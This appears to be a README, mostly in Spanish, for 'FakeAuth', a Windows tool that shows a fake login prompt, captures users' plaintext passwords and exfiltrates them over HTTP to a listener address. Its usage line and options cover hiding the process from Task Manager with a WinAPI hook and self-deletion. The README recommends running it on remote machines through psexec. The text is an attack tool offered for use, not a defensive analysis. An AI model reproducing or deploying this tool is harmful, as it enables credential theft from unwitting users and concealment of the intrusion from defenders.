
Crea un prompt de autenticación falso para capturar las contraseñas en texto plano de los usuarios.
FakeAuth es una herramienta que solicita credenciales de usuario y las exfiltra mediante el protocolo HTTP.
Inspirado en los siguientes proyectos
Espera código sucio y algunos errores ;)
Sin requisitos especiales
Usage: FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll)
mode (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type (integer) -> Prompt Style (1,2)
count (long) -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title (string) -> Prompt title (visible in type=1 only)
message (string) -> Window message
listener (string) -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout
La mejor forma de usarlo es ejecutarlo en máquinas remotas en una sesión de usuario (psexec u otras herramientas auxiliares).
@atn1ght1 Twitter